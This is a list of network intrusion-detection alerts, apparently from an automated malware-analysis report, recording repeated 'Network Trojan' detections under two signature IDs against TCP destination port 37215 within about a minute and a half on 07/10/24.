                  SID:2835222
                  Source Port:40820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.947291
                  SID:2835222
                  Source Port:43138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.768377
                  SID:2829579
                  Source Port:58636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.417770
                  SID:2835222
                  Source Port:38778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.613103
                  SID:2835222
                  Source Port:43390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.339944
                  SID:2829579
                  Source Port:43914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.229279
                  SID:2835222
                  Source Port:57510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.508048
                  SID:2835222
                  Source Port:40896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.254962
                  SID:2835222
                  Source Port:52906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.029785
                  SID:2835222
                  Source Port:35470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189458
                  SID:2835222
                  Source Port:42354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.487883
                  SID:2835222
                  Source Port:53944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.362026
                  SID:2829579
                  Source Port:42694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.058852
                  SID:2835222
                  Source Port:55540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.461924
                  SID:2835222
                  Source Port:41998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.432344
                  SID:2835222
                  Source Port:46898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.179402
                  SID:2835222
                  Source Port:57314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.562068
                  SID:2829579
                  Source Port:45118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.921324
                  SID:2829579
                  Source Port:45114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.061438
                  SID:2835222
                  Source Port:59354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.614472
                  SID:2829579
                  Source Port:48826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.756969
                  SID:2835222
                  Source Port:46434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.112829
                  SID:2829579
                  Source Port:50240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.852897
                  SID:2829579
                  Source Port:51164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.177023
                  SID:2835222
                  Source Port:59540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.788473
                  SID:2835222
                  Source Port:58778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.834166
                  SID:2829579
                  Source Port:37086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.973099
                  SID:2829579
                  Source Port:58572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.611140
                  SID:2829579
                  Source Port:55142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.352248
                  SID:2829579
                  Source Port:56032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.492137
                  SID:2835222
                  Source Port:52876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.011649
                  SID:2829579
                  Source Port:51480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.324879
                  SID:2829579
                  Source Port:60224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.888639
                  SID:2829579
                  Source Port:50506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619678
                  SID:2829579
                  Source Port:57272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.896003
                  SID:2835222
                  Source Port:32958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.402603
                  SID:2829579
                  Source Port:36074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078951
                  SID:2835222
                  Source Port:40544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.030182
                  SID:2835222
                  Source Port:46028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.316090
                  SID:2835222
                  Source Port:54258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415369
                  SID:2829579
                  Source Port:36604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.641903
                  SID:2829579
                  Source Port:47484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.172651
                  SID:2829579
                  Source Port:57064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617343
                  SID:2829579
                  Source Port:54872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.023447
                  SID:2829579
                  Source Port:54000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.420210
                  SID:2835222
                  Source Port:48740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.092511
                  SID:2835222
                  Source Port:38598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.672861
                  SID:2829579
                  Source Port:34664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.675558
                  SID:2835222
                  Source Port:43234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.349676
                  SID:2835222
                  Source Port:56422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.665617
                  SID:2835222
                  Source Port:37350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.538305
                  SID:2835222
                  Source Port:51422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.698481
                  SID:2835222
                  Source Port:38646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.867298
                  SID:2829579
                  Source Port:51262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.881507
                  SID:2835222
                  Source Port:42632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505910
                  SID:2829579
                  Source Port:56898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.158700
                  SID:2835222
                  Source Port:47580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.533087
                  SID:2829579
                  Source Port:43756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.635784
                  SID:2835222
                  Source Port:37628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.307932
                  SID:2835222
                  Source Port:37896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633588
                  SID:2835222
                  Source Port:47420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.445688
                  SID:2835222
                  Source Port:42222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.561854
                  SID:2829579
                  Source Port:46900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.256885
                  SID:2835222
                  Source Port:59702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.624233
                  SID:2829579
                  Source Port:34604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583025
                  SID:2829579
                  Source Port:53968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.942691
                  SID:2835222
                  Source Port:35816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.844919
                  SID:2835222
                  Source Port:60926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.598078
                  SID:2829579
                  Source Port:57600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081950
                  SID:2835222
                  Source Port:53540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.255298
                  SID:2835222
                  Source Port:42436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.463171
                  SID:2829579
                  Source Port:59552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.223622
                  SID:2835222
                  Source Port:40688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.456990
                  SID:2835222
                  Source Port:35296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.850694
                  SID:2835222
                  Source Port:51858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.567555
                  SID:2829579
                  Source Port:44228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.616347
                  SID:2829579
                  Source Port:33736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.770458
                  SID:2829579
                  Source Port:39184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.881648
                  SID:2829579
                  Source Port:60956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583025
                  SID:2829579
                  Source Port:55646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.470125
                  SID:2835222
                  Source Port:40494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.911358
                  SID:2829579
                  Source Port:46100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.731752
                  SID:2835222
                  Source Port:48320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.971781
                  SID:2835222
                  Source Port:36540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.411489
                  SID:2829579
                  Source Port:41128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.490780
                  SID:2835222
                  Source Port:43064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.852572
                  SID:2829579
                  Source Port:58420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.871352
                  SID:2835222
                  Source Port:45812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.292595
                  SID:2835222
                  Source Port:57538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.965936
                  SID:2829579
                  Source Port:52012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.220771
                  SID:2829579
                  Source Port:60028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.435352
                  SID:2835222
                  Source Port:36768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.950473
                  SID:2829579
                  Source Port:51010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.819552
                  SID:2835222
                  Source Port:35564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.748241
                  SID:2835222
                  Source Port:38638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.985510
                  SID:2829579
                  Source Port:59068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.352052
                  SID:2835222
                  Source Port:57710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.284234
                  SID:2835222
                  Source Port:55574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.489604
                  SID:2829579
                  Source Port:49068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.480134
                  SID:2829579
                  Source Port:33212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.956245
                  SID:2835222
                  Source Port:52866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.042131
                  SID:2835222
                  Source Port:51080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2835222
                  Source Port:38162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.122973
                  SID:2835222
                  Source Port:52248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098508
                  SID:2829579
                  Source Port:49856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.607269
                  SID:2829579
                  Source Port:44398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.547773
                  SID:2835222
                  Source Port:60170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022282
                  SID:2835222
                  Source Port:58630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.172720
                  SID:2835222
                  Source Port:47462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.412825
                  SID:2835222
                  Source Port:53714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.852238
                  SID:2835222
                  Source Port:34030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879424
                  SID:2835222
                  Source Port:44092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2835222
                  Source Port:35108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.939106
                  SID:2829579
                  Source Port:57058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.438792
                  SID:2835222
                  Source Port:52870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.973462
                  SID:2829579
                  Source Port:43092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.419357
                  SID:2829579
                  Source Port:49716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.848690
                  SID:2835222
                  Source Port:34918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.899936
                  SID:2835222
                  Source Port:47162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.136540
                  SID:2829579
                  Source Port:57078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.089807
                  SID:2835222
                  Source Port:32886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.343268
                  SID:2829579
                  Source Port:45744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.893689
                  SID:2829579
                  Source Port:44316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2829579
                  Source Port:42058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.536872
                  SID:2835222
                  Source Port:54200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.868387
                  SID:2829579
                  Source Port:51486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.320404
                  SID:2829579
                  Source Port:49258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.492179
                  SID:2835222
                  Source Port:49094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.252438
                  SID:2829579
                  Source Port:47734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.456232
                  SID:2829579
                  Source Port:52734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.083830
                  SID:2835222
                  Source Port:57388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.000984
                  SID:2835222
                  Source Port:49996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.991411
                  SID:2829579
                  Source Port:50510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.474239
                  SID:2835222
                  Source Port:37042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.018095
                  SID:2829579
                  Source Port:51368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.498081
                  SID:2829579
                  Source Port:49938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839204
                  SID:2829579
                  Source Port:53386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.534409
                  SID:2835222
                  Source Port:36798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.553944
                  SID:2835222
                  Source Port:44280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.529437
                  SID:2835222
                  Source Port:44756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629706
                  SID:2829579
                  Source Port:34104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.956941
                  SID:2829579
                  Source Port:39580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.655669
                  SID:2835222
                  Source Port:51060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.782685
                  SID:2829579
                  Source Port:59434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.761557
                  SID:2829579
                  Source Port:60132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.986664
                  SID:2835222
                  Source Port:36278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.605910
                  SID:2835222
                  Source Port:53788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.379030
                  SID:2835222
                  Source Port:33126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.957475
                  SID:2829579
                  Source Port:44324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155945
                  SID:2835222
                  Source Port:38276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.977677
                  SID:2835222
                  Source Port:48662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.659396
                  SID:2835222
                  Source Port:35168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.651021
                  SID:2829579
                  Source Port:38450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.488063
                  SID:2835222
                  Source Port:37746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.575956
                  SID:2829579
                  Source Port:53912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.944051
                  SID:2829579
                  Source Port:39502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.357505
                  SID:2829579
                  Source Port:36222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.957397
                  SID:2829579
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.043481
                  SID:2829579
                  Source Port:44738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835988
                  SID:2829579
                  Source Port:50204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.759956
                  SID:2835222
                  Source Port:53176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234133
                  SID:2835222
                  Source Port:60546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.864679
                  SID:2829579
                  Source Port:56756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.526657
                  SID:2829579
                  Source Port:46274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.792966
                  SID:2829579
                  Source Port:57478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.340755
                  SID:2835222
                  Source Port:39878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.433645
                  SID:2835222
                  Source Port:42404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.027342
                  SID:2829579
                  Source Port:37712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.841554
                  SID:2829579
                  Source Port:45814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.630697
                  SID:2835222
                  Source Port:58332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.329520
                  SID:2829579
                  Source Port:42026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.791208
                  SID:2829579
                  Source Port:44828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621432
                  SID:2835222
                  Source Port:44116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.301289
                  SID:2829579
                  Source Port:41214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657452
                  SID:2829579
                  Source Port:48984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.835787
                  SID:2829579
                  Source Port:54320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.645401
                  SID:2835222
                  Source Port:58932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.810564
                  SID:2835222
                  Source Port:38126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.002573
                  SID:2829579
                  Source Port:40106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.281691
                  SID:2829579
                  Source Port:37604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.844638
                  SID:2835222
                  Source Port:36204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.310964
                  SID:2829579
                  Source Port:54374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.293850
                  SID:2829579
                  Source Port:50792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
